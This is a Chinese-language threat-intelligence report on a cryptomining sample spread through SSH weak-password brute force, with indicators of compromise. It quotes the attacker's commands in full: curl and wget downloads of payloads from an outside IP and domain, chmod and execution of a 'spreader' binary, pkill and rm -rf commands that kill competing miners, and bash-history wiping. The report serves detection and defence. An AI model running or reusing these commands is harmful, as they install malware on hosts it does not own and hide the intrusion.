报告信息

简述

该样本通过ssh登录后,存在一系列修改定时任务、清除挖矿竞品、读取系统信息的行为,根据不同系统架构执行脚本,具有较强的挖矿样本的特征.

样本类型

挖矿

elkeid 样本ID

elkeid_20221207_miner_5

捕获时间

20221207

最近活跃时间

20221207

关键词

b4ngl4d3shS3N941,.billgates,spreader

已知入侵途径

• 弱口令爆破

涉及样本

• /tmp/b4ngl4d3shS3N941.x86
• /tmp/b4ngl4d3shS3N941.aarch64
• /tmp/b4ngl4d3shS3N941.arm(.arm7 .i586 .i686 ... 等同名不同后缀的版本)

主要行为

• 下载

  • curl -s -L -O 107.182.129.219/.billgates/b4ngl4d3shS3N941.x86 (.arm 等同名样本)
  • wget -q arhivehaceru.com/payload
  • curl -O -s -L arhivehaceru.com/.x/Update

• 赋权

  • chmod 777 b4ngl4d3shS3N941.aarch64

• 重命名

  • mv b4ngl4d3shS3N941.aarch64 .aarch64

• 执行

  • ./.arm6 spreader (.arm6为重命名后的样本)

• 清理竞品

  • rm -rf /root/c3pool*
  • pkill -9 xri
  • pkill -9 xrx
  • pkill -STOP xmrig
  • pkill -STOP Opera
  • pkill -STOP kdevtmpfsi
  • pkill -STOP kthreaddk
  • pkill -STOP intelshell
  • pkill -9 SRBMiner
  • pkill -9 intelshell
  • pkill -STOP lowkeymaker
  • rm -rf hoze

• 清除历史记录

  • history -c ; rm -rf .bash_history ~/.bash_history
  • ./payload ; rm -rf payload ; 执行后清除

IOC

• ip

  • 107.182.129.219
  • arhivehaceru.com

• SHA256

  • fb6861f2cfec379eefdb36fe92b1b46308ffe28bddb964bc45c6c0f48c7bb611
  • b843bf8c71451349cf5fcb82cfa450518f38f4cbdff963b88bd5885b618df66d
  • bda6d96421b32c1654c96eb95f218b40227d42bfe7076c191b8c2b6294d5b5ff
  • e9399af4a8f995b94f858f42e1ea8b5cd8c78a0cf1788c784f002640da6bc3ea
  • 5498995c9e68c6bfbba4041e0a12468b21d7158f684404250c3e7e400621dc8b

参考链接

• 107.182.129.219

https://www.virustotal.com/gui/url/9f1c31fc4ee875ff1124f2e28311f3b5817fdbb71ea9f05340eb4a73c0b3c4d9

• arhivehaceru.com

https://www.virustotal.com/gui/url/cab48dc408f5496e00dd9a0058d7d6bc128d69b06738204ba47c0a216e68b135